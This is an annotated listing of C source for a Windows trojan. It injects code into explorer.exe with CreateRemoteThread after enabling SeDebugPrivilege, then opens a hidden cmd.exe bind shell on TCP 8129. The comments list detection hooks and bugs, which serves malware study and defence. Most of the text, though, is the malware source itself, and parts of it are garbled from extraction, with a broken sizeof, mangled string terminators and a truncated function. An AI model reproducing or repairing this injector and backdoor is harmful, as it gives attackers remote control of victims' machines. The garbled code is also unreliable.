
/*
 * Annotated analysis listing (review copy).
 *
 * Page lede, translated: "C-language trojan source, well worth studying."
 *
 * What the visible code does: a 32-bit Win32 injector.  WinMain enables
 * SeDebugPrivilege, opens EXPLORER.EXE with PROCESS_ALL_ACCESS, allocates an
 * RWX region there, copies 4 KB starting at ThreadProc into it together with a
 * parameter block of pre-resolved API addresses, and starts it with
 * CreateRemoteThread.  Inside explorer.exe, ThreadProc listens on TCP 8129,
 * accepts ONE connection, spawns a hidden cmd.exe with its std handles on two
 * pipes, and relays bytes between the socket and the pipes (a bind shell).
 *
 * Detection hooks that follow directly from the calls below:
 *   - OpenProcessToken/AdjustTokenPrivileges for SE_DEBUG_NAME, then
 *     OpenProcess(PROCESS_ALL_ACCESS) on explorer.exe (Sysmon EID 10).
 *   - VirtualAllocEx(PAGE_EXECUTE_READWRITE) + WriteProcessMemory +
 *     CreateRemoteThread into explorer.exe (Sysmon EID 8).
 *   - explorer.exe binding/listening on TCP 8129 and spawning cmd.exe with
 *     SW_HIDE and redirected std handles.
 *   - Hard-coded strings: "wsock32.dll", "cmd.exe", "Sucess!",
 *     "ConnectSucessful!".
 *
 * The listing was recovered from a paginated web page: whitespace between
 * tokens was lost, comment markers were stripped, and page watermarks were
 * interleaved with the code.  Spacing and comment markers are restored and the
 * watermarks dropped here; every code token is left exactly as printed,
 * including the garbles called out inline.  Nothing is fixed on purpose: this
 * is kept as a non-functional study artifact.  EnablePrivilege and
 * GetPidByName are declared but their bodies are not on this page.
 */
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#include <windows.h>
#include <Shlwapi.h>          // not used by anything visible on this page
#pragma comment(lib, "Shlwapi.lib")
#include <tlhelp32.h>         // presumably for GetPidByName (body not shown)
#include <stdio.h>
#include <string.h>

// Parameter block copied into the target process (original comment: 参数结构).
// Every dw* field is a function address resolved in the INJECTOR and reused
// as-is in explorer.exe; that only works because kernel32/wsock32/user32 load
// at the same base in both processes.  DWORD-sized pointers make this 32-bit
// only.  The char arrays carry the strings the injected code needs, since the
// injected copy of ThreadProc cannot reference the injector's own literals.
typedef struct _RemotePara {
    DWORD dwLoadLibrary;
    DWORD dwFreeLibrary;        // resolved and passed, never called below
    DWORD dwGetProcAddress;     // resolved and passed, never called below
    DWORD dwGetModuleHandle;    // resolved and passed, never called below
    DWORD dwWSAStartup;
    DWORD dwSocket;
    DWORD dwhtons;
    DWORD dwbind;
    DWORD dwlisten;
    DWORD dwaccept;
    DWORD dwsend;
    DWORD dwrecv;
    DWORD dwclosesocket;
    DWORD dwCreateProcessA;
    DWORD dwPeekNamedPipe;
    DWORD dwWriteFile;
    DWORD dwReadFile;
    DWORD dwCloseHandle;
    DWORD dwCreatePipe;
    DWORD dwTerminateProcess;   // resolved and passed, never called below
    DWORD dwMessageBox;
    char strMessageBox[12];
    char winsockDll[16];
    char cmd[10];               // see the strcat in WinMain: the literal as
                                // printed is 10 chars, so the terminator lands
                                // in Buff (likely an extraction artifact of \0)
    char Buff[4096];            // shared relay buffer, lives in the target process
    char telnetmsg[60];
} RemotePara;

// Enable a privilege on a token (original comment: 提升应用级调试权限).
// Used below with SE_DEBUG_NAME.  Definition is cut off at the end of the page.
BOOL EnablePrivilege(HANDLE hToken, LPCTSTR szPrivName, BOOL fEnable);

// Look up a PID by image name (original comment: 根据进程名称得到进程ID).
// Definition not on this page.
DWORD GetPidByName(char *szName);

// Body that is copied byte-for-byte into explorer.exe and run there
// (original comment: 远程线程执行体).  It must be position-independent and
// under THREADSIZE (4096) bytes, and may only call through the addresses in
// *Para.  Note that ZeroMemory/memset/MAKEWORD below are NOT routed through
// Para: if the compiler emits a real call for them, the injected copy calls an
// address that only made sense in the injector.
DWORD __stdcall ThreadProc(RemotePara *Para) {
    WSADATA WSAData;
    WORD nVersion;
    SOCKET listenSocket;
    SOCKET clientSocket;
    struct sockaddr_in server_addr;
    struct sockaddr_in client_addr;
    int iAddrSize = sizeof(client_addr);
    SECURITY_ATTRIBUTES sa;     // never initialised before being handed to
                                // CreatePipe: bInheritHandle is stack garbage,
                                // so whether cmd.exe inherits the pipes is luck
    HANDLE hReadPipe1;
    HANDLE hWritePipe1;
    HANDLE hReadPipe2;
    HANDLE hWritePipe2;
    STARTUPINFO si;
    PROCESS_INFORMATION ProcessInformation;
    unsigned long lBytesRead = 0;

    typedef HINSTANCE (__stdcall *PLoadLibrary)(char *);
    typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR);
    typedef HINSTANCE (__stdcall *PFreeLibrary)(HINSTANCE);
    typedef HINSTANCE (__stdcall *PGetModuleHandle)(HMODULE);

    FARPROC PMessageBoxA;
    FARPROC PWSAStartup;
    FARPROC PSocket;
    FARPROC Phtons;
    FARPROC Pbind;
    FARPROC Plisten;
    FARPROC Paccept;
    FARPROC Psend;
    FARPROC Precv;
    FARPROC Pclosesocket;
    FARPROC PCreateProcessA;
    FARPROC PPeekNamedPipe;
    FARPROC PWriteFile;
    FARPROC PReadFile;
    FARPROC PCloseHandle;
    FARPROC PCreatePipe;
    FARPROC PTerminateProcess;

    // Rebuild callable pointers from the addresses the injector supplied.
    PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para->dwLoadLibrary;
    PGetProcAddress GetProcAddressFunc = (PGetProcAddress)Para->dwGetProcAddress;
    PFreeLibrary FreeLibraryFunc = (PFreeLibrary)Para->dwFreeLibrary;
    PGetModuleHandle GetModuleHandleFunc = (PGetModuleHandle)Para->dwGetModuleHandle;

    // Force wsock32.dll into explorer.exe so the pre-resolved socket addresses
    // are valid there.
    LoadLibraryFunc(Para->winsockDll);
    PWSAStartup = (FARPROC)Para->dwWSAStartup;
    PSocket = (FARPROC)Para->dwSocket;
    Phtons = (FARPROC)Para->dwhtons;
    Pbind = (FARPROC)Para->dwbind;
    Plisten = (FARPROC)Para->dwlisten;
    Paccept = (FARPROC)Para->dwaccept;
    Psend = (FARPROC)Para->dwsend;
    Precv = (FARPROC)Para->dwrecv;
    Pclosesocket = (FARPROC)Para->dwclosesocket;
    PCreateProcessA = (FARPROC)Para->dwCreateProcessA;
    PPeekNamedPipe = (FARPROC)Para->dwPeekNamedPipe;
    PWriteFile = (FARPROC)Para->dwWriteFile;
    PReadFile = (FARPROC)Para->dwReadFile;
    PCloseHandle = (FARPROC)Para->dwCloseHandle;
    PCreatePipe = (FARPROC)Para->dwCreatePipe;
    PTerminateProcess = (FARPROC)Para->dwTerminateProcess;
    PMessageBoxA = (FARPROC)Para->dwMessageBox;

    // All calls through FARPROC are unprototyped: argument types and counts are
    // not checked by the compiler.
    nVersion = MAKEWORD(2, 1);
    PWSAStartup(nVersion, (LPWSADATA)&WSAData);
    listenSocket = PSocket(AF_INET, SOCK_STREAM, 0);
    if (listenSocket == INVALID_SOCKET) return 0;

    // Bind shell: listens on all interfaces, TCP 8129 (a fixed IOC).
    server_addr.sin_family = AF_INET;
    server_addr.sin_port = Phtons((unsigned short)(8129));
    server_addr.sin_addr.s_addr = INADDR_ANY;
    // Garbled as printed: "sizeof(SOCKADDR_))IN" is presumably
    // "sizeof(SOCKADDR_IN))" in the original.  Left as extracted.
    if (Pbind(listenSocket, (struct sockaddr *)&server_addr, sizeof(SOCKADDR_))IN != 0) return 0;
    if (Plisten(listenSocket, 5)) return 0;
    // Blocks until a single client connects; the accept result is not checked.
    clientSocket = Paccept(listenSocket, (struct sockaddr *)&client_addr, &iAddrSize);
    //Psend(clientSocket,Para->telnetmsg,60,0);

    // Pipe 1: cmd.exe stdout/stderr -> us.  Pipe 2: us -> cmd.exe stdin.
    if (!PCreatePipe(&hReadPipe1, &hWritePipe1, &sa, 0)) return 0;
    if (!PCreatePipe(&hReadPipe2, &hWritePipe2, &sa, 0)) return 0;
    // Original comment claimed ZeroMemory is a C runtime function that can be
    // called directly.  In the injected copy that is only safe if it expands
    // inline; a call into the injector's CRT would fault here.
    ZeroMemory(&si, sizeof(si));
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.wShowWindow = SW_HIDE;
    si.hStdInput = hReadPipe2;
    si.hStdOutput = si.hStdError = hWritePipe1;
    // bInheritHandles = 1: the pipe handles reach cmd.exe only if they were
    // created inheritable, which depends on the uninitialised `sa` above.
    if (!PCreateProcessA(NULL, Para->cmd, NULL, NULL, 1, 0, NULL, NULL, &si, &ProcessInformation)) return 0;

    // Relay loop: busy-polls the child's output pipe; when it is empty, blocks
    // on the socket for the next command.  Polling with PeekNamedPipe means
    // the loop spins at full speed whenever both sides are idle-but-connected.
    while (1) {
        memset(Para->Buff, 0, 4096);
        PPeekNamedPipe(hReadPipe1, Para->Buff, 4096, &lBytesRead, 0, 0);
        if (lBytesRead) {
            if (!PReadFile(hReadPipe1, Para->Buff, lBytesRead, &lBytesRead, 0)) break;
            // send() returns SOCKET_ERROR (-1) on failure, which is non-zero,
            // so a failed send does not leave the loop.
            if (!Psend(clientSocket, Para->Buff, lBytesRead, 0)) break;
        } else {
            // recv() returns int; SOCKET_ERROR (-1) stored in an unsigned long
            // becomes ULONG_MAX, so `<= 0` only catches a clean close (0).  On
            // a socket error the next line writes 0xFFFFFFFF bytes from Buff.
            lBytesRead = Precv(clientSocket, Para->Buff, 4096, 0);
            if (lBytesRead <= 0) break;
            if (!PWriteFile(hWritePipe2, Para->Buff, lBytesRead, &lBytesRead, 0)) break;
        }
    }

    // Teardown.  The spawned cmd.exe is neither terminated nor waited on, and
    // ProcessInformation's handles are never closed; PTerminateProcess is
    // resolved above but unused.
    PCloseHandle(hWritePipe2);
    PCloseHandle(hReadPipe1);
    PCloseHandle(hReadPipe2);
    PCloseHandle(hWritePipe1);
    Pclosesocket(listenSocket);
    Pclosesocket(clientSocket);
    // Visible artefact on the victim desktop (explorer.exe owns the box).
    PMessageBoxA(NULL, Para->strMessageBox, Para->strMessageBox, MB_OK);
    return 0;
}

// Injector entry point: privilege escalation for debugging, remote allocation,
// code + parameter copy, remote thread start.
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
    const DWORD THREADSIZE = 1024 * 4;   // bytes copied from &ThreadProc; assumes
                                         // the function is shorter than this and
                                         // that the following 4 KB are readable
    DWORD byte_write;
    void *pRemoteThread;
    HANDLE hToken, hRemoteProcess, hThread;
    HINSTANCE hKernel, hUser32, hSock;
    RemotePara myRemotePara, *pRemotePara;
    DWORD pID;

    // SeDebugPrivilege lets OpenProcess succeed on processes of other users
    // (when run as an administrator).  Return values are not checked.
    OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken);
    EnablePrivilege(hToken, SE_DEBUG_NAME, TRUE);

    // Open the target with PROCESS_ALL_ACCESS
    // (original comment: 获得指定进程句柄,并设其权限为PROCESS_ALL_ACCESS).
    pID = GetPidByName("EXPLORER.EXE");
    if (pID == 0) return 0;
    hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pID);
    if (!hRemoteProcess) return 0;

    // RWX allocation in the target (original comment: 在远程进程地址空间分配虚拟内存).
    pRemoteThread = VirtualAllocEx(hRemoteProcess, 0, THREADSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!pRemoteThread) return 0;

    // Copy ThreadProc's machine code into the target
    // (original comment: 将线程执行体ThreadProc写入远程进程).  With incremental
    // linking &ThreadProc may be a jump thunk rather than the body itself.
    if (!WriteProcessMemory(hRemoteProcess, pRemoteThread, &ThreadProc, THREADSIZE, 0)) return 0;

    // Resolve every API the injected code needs in THIS process and ship the
    // addresses over; ZeroMemory first so the strcat calls below start from
    // empty (NUL-terminated) arrays.  LoadLibrary/GetProcAddress results are
    // not checked.
    ZeroMemory(&myRemotePara, sizeof(RemotePara));
    hKernel = LoadLibrary("kernel32.dll");
    myRemotePara.dwLoadLibrary = (DWORD)GetProcAddress(hKernel, "LoadLibraryA");
    myRemotePara.dwFreeLibrary = (DWORD)GetProcAddress(hKernel, "FreeLibrary");
    myRemotePara.dwGetProcAddress = (DWORD)GetProcAddress(hKernel, "GetProcAddress");
    myRemotePara.dwGetModuleHandle = (DWORD)GetProcAddress(hKernel, "GetModuleHandleA");
    myRemotePara.dwCreateProcessA = (DWORD)GetProcAddress(hKernel, "CreateProcessA");
    myRemotePara.dwPeekNamedPipe = (DWORD)GetProcAddress(hKernel, "PeekNamedPipe");
    myRemotePara.dwWriteFile = (DWORD)GetProcAddress(hKernel, "WriteFile");
    myRemotePara.dwReadFile = (DWORD)GetProcAddress(hKernel, "ReadFile");
    myRemotePara.dwCloseHandle = (DWORD)GetProcAddress(hKernel, "CloseHandle");
    myRemotePara.dwCreatePipe = (DWORD)GetProcAddress(hKernel, "CreatePipe");
    myRemotePara.dwTerminateProcess = (DWORD)GetProcAddress(hKernel, "TerminateProcess");
    // Note the mismatch: the build links ws2_32.lib (pragma above) but the
    // addresses handed to the target come from wsock32.dll.
    hSock = LoadLibrary("wsock32.dll");
    myRemotePara.dwWSAStartup = (DWORD)GetProcAddress(hSock, "WSAStartup");
    myRemotePara.dwSocket = (DWORD)GetProcAddress(hSock, "socket");
    myRemotePara.dwhtons = (DWORD)GetProcAddress(hSock, "htons");
    myRemotePara.dwbind = (DWORD)GetProcAddress(hSock, "bind");
    myRemotePara.dwlisten = (DWORD)GetProcAddress(hSock, "listen");
    myRemotePara.dwaccept = (DWORD)GetProcAddress(hSock, "accept");
    myRemotePara.dwrecv = (DWORD)GetProcAddress(hSock, "recv");
    myRemotePara.dwsend = (DWORD)GetProcAddress(hSock, "send");
    myRemotePara.dwclosesocket = (DWORD)GetProcAddress(hSock, "closesocket");
    hUser32 = LoadLibrary("user32.dll");
    myRemotePara.dwMessageBox = (DWORD)GetProcAddress(hUser32, "MessageBoxA");

    // Strings for the injected code.  As printed, each literal ends in "//0"
    // (two slashes) rather than an escaped NUL, so the visible characters are
    // part of the string: "cmd.exe//0" is 10 bytes and strcat's terminator is
    // written to cmd[10], i.e. into Buff[0].  Most likely "\0" in the original,
    // mangled by extraction; left as printed.
    strcat(myRemotePara.strMessageBox, "Sucess!//0");
    strcat(myRemotePara.winsockDll, "wsock32.dll//0");
    strcat(myRemotePara.cmd, "cmd.exe//0");
    strcat(myRemotePara.telnetmsg, "ConnectSucessful!//n//0");

    // Copy the parameter block into the target (original comment: 写进目标进程).
    pRemotePara = (RemotePara *)VirtualAllocEx(hRemoteProcess, 0, sizeof(RemotePara), MEM_COMMIT, PAGE_READWRITE);
    if (!pRemotePara) return 0;
    if (!WriteProcessMemory(hRemoteProcess, pRemotePara, &myRemotePara, sizeof myRemotePara, 0)) return 0;

    // Start the injected thread (original comment: 启动线程).  The last argument
    // receives the thread id, not a byte count; hThread is never checked or closed.
    hThread = CreateRemoteThread(hRemoteProcess, 0, 0, (DWORD(__stdcall *)(void *))pRemoteThread, pRemotePara, 0, &byte_write);

    // Spins forever at 100% CPU, so everything after this loop is dead code:
    // the libraries are never freed and the handles never closed.  Presumably
    // meant to keep the injector alive; the injected thread does not need it.
    while (1) {}
    FreeLibrary(hKernel);
    FreeLibrary(hSock);
    FreeLibrary(hUser32);
    CloseHandle(hRemoteProcess);
    CloseHandle(hToken);
    return 0;
}

// Definition of EnablePrivilege begins here; the page ends mid-signature.
BOOL EnablePrivilege(HANDLE hToken, LPCTSTR szPri
